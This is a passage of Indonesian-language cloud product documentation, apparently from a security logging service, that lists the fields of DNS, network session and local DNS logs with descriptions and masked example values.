Jawaban DNS yang dikembalikan oleh server DNS, yang menunjukkan hasil resolusi. Jawaban DNS berisi alamat IP ke mana nama domain yang diminta diresolusi atau informasi lainnya seperti rekaman A dan rekaman AAAA.

example.com A IN 52 1.2.XX.XX

answer_num

Jumlah jawaban DNS.

1

authority

Field otoritas yang dikembalikan oleh server DNS. Otoritas adalah server DNS yang mengelola dan menyelesaikan nama domain. Field otoritas berisi informasi tentang server DNS yang menyediakan rekaman DNS untuk nama domain yang diminta, seperti rekaman NS.

NS IN 17597

authority_num

Jumlah otoritas.

1

client_subnet

Subnet klien.

59.152.XX.XX

dst_ip

Alamat IP tujuan.

106.55.XX.XX

dst_port

Port tujuan.

53

net_connect_dir

Arah transmisi data. Nilai valid:

  • in: Permintaan ke server DNS

  • out: Respons dari server DNS

out

qid

ID dari query.

13551

query_name

Nama domain yang di-query.

example.com

query_type

Tipe dari query.

A

query_datetime

Waktu query.

2024-08-01 08:33:58

rcode

Kode respons yang dikembalikan oleh server DNS, yang menunjukkan hasil resolusi DNS.

0

region

ID wilayah sumber. Nilai valid:

  • 1: China (Beijing)

  • 2: China (Qingdao)

  • 3: China (Hangzhou)

  • 4: China (Shanghai)

  • 5: China (Shenzhen)

  • 6: Wilayah lainnya

1

response_datetime

Waktu respons server DNS.

2024-08-01 08:31:25

src_ip

Alamat IP sumber.

106.11.XX.XX

src_port

Port sumber.

22

Log sesi jaringan

Nama bidang

Deskripsi

Contoh

asset_type

Jenis aset dari mana log dikumpulkan. Nilai yang valid:

  • ECS: Instance Elastic Compute Service (ECS)

  • SLB: Instance Server Load Balancer (SLB)

  • NAT: NAT Gateway

ECS

dst_ip

Alamat IP tujuan.

119.96.XX.XX

dst_port

Port tujuan.

443

net_connect_dir

Arah dari sesi. Nilainya tetap sebagai out.

  • Jika nilai dari bidang proto adalah tcp, nilai dari bidang ini menunjukkan permintaan arah keluar.

  • Jika nilai dari bidang proto adalah udp, nilai dari bidang ini tidak menunjukkan arah permintaan dan hanya untuk referensi saja.

out

l4_proto

Jenis protokol. Nilai yang valid:

  • tcp

  • udp

tcp

session_time

Waktu ketika sesi dimulai.

2024-08-01 08:31:18

src_ip

Alamat IP sumber.

121.40.XX.XX

src_port

Port sumber.

53602

Log DNS Lokal

Nama Field

Deskripsi

Contoh

anwser_name

Nama jawaban DNS, yang menunjukkan nama domain yang terkait dengan rekaman sumber daya.

example.com

answer_rdata

Bidang area data sumber daya (RDA) dari jawaban DNS, yang menunjukkan nilai spesifik dari hasil resolusi.

106.11.XX.XX

answer_ttl

Waktu hidup (TTL) dari jawaban DNS. Satuan: detik.

600

answer_type

Tipe jawaban DNS. Nilai valid:

  • 1: Rekaman A

  • 2: Rekaman NS

  • 5: Rekaman CNAME

  • 6: Rekaman SOA

  • 10: Rekaman NULL

  • 12: Rekaman PTR

  • 15: Rekaman MX

  • 16: Rekaman TXT

  • 25: Rekaman KEY

  • 28: Rekaman AAAA

  • 33: Rekaman SRV

  • 41: Rekaman OPT

  • 43: Record DS

  • 44: Rekaman SSHFP

  • 45: Rekaman IPSECKEY

  • 46: Rekaman RRSIG

  • 47: Rekaman NSEC

1

dst_ip

Alamat IP tujuan. Nilainya adalah alamat IP desimal secara default.

323223****

dst_port

Port tujuan.

53

group_id

ID grup. ID grup yang sama menunjukkan permintaan atau respons DNS yang sama.

3

host

Nama host.

hostname

id

ID kueri, yang mengidentifikasi permintaan atau respons DNS.

64588

instance_id

ID instance.

i-2zeg4zldn8zypsfg****

internet_ip

Alamat IP publik yang termasuk dalam permintaan atau respons DNS.

121.40.XX.XX

ip_ttl

TTL paket IP dalam permintaan atau respons DNS.

64

query_name

Nama domain yang di-query.

example.com

query_type

Tipe kueri. Nilai valid:

  • 1: Rekaman A

  • 2: Rekaman NS

  • 5: Rekaman CNAME

  • 6: Rekaman SOA

  • 10: Rekaman NULL

  • 12: Rekaman PTR

  • 15: Rekaman MX

  • 16: Rekaman TXT

  • 25: Rekaman KEY

  • 28: Rekaman AAAA

  • 33: Rekaman SRV

1

src_ip

Alamat IP dari mana permintaan atau respons DNS dimulai. Nilainya adalah alamat IP desimal secara default.

168427****

src_port

Nomor port dari mana permintaan atau respons DNS dimulai.

53

start_time

Timestamp awal, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik.

1719472214

time_usecond

Timestamp permintaan atau respons DNS. Satuan: mikrodetik.

590662

tunnel_id

ID tunnel yang digunakan oleh permintaan atau respons DNS. Tunneling adalah cara mentransfer data menggunakan protokol berbeda. Tunneling dapat digunakan untuk akses aman ke Internet atau komunikasi lintas jaringan berbeda.

514763